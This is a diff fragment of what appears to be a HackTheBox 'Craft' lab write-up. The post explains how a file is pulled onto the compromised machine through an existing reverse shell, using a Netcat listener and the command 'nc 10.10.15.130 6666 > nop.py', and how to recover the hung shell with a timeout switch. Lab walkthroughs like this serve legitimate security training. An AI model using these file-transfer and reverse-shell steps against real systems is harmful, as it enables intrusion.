ponderng/Sidequests/_posts/2019-12-09-hackthebox-craft.md

 To get the file over to the remote system, set up a Netcat listener that feeds in your newly created file&#8230; like this:
 <img class="alignnone size-full wp-image-466" src="/assets/uploads/2019/12/2019-12-05_18h48_05.png" alt="" width="801" height="117" srcset="/assets/uploads/2019/12/2019-12-05_18h48_05.png 801w, /assets/uploads/2019/12/2019-12-05_18h48_05-300x44.png 300w, /assets/uploads/2019/12/2019-12-05_18h48_05-768x112.png 768w" sizes="(max-width: 801px) 100vw, 801px" />

-To finish getting the file transferred, go back into your reverse shell and connect back again to your new listener with <span class="lang:sh decode:true crayon-inline">nc 10.10.15.130 6666 > nop.py</span> .
+To finish getting the file transferred, go back into your reverse shell and connect back again to your new listener with `nc 10.10.15.130 6666 > nop.py` .

 The initial shell will become unusable after establishing this new connection.
 To fix that, use a &#8220;-w 3&#8221; switch on one of the Netcat commands to get it to timeout after 3 seconds.
 After the 3 seconds, you&#8217;ll be able to use the limited shell again without starting another one.
 Otherwise, just disconnect the reverse shell and re-establish it.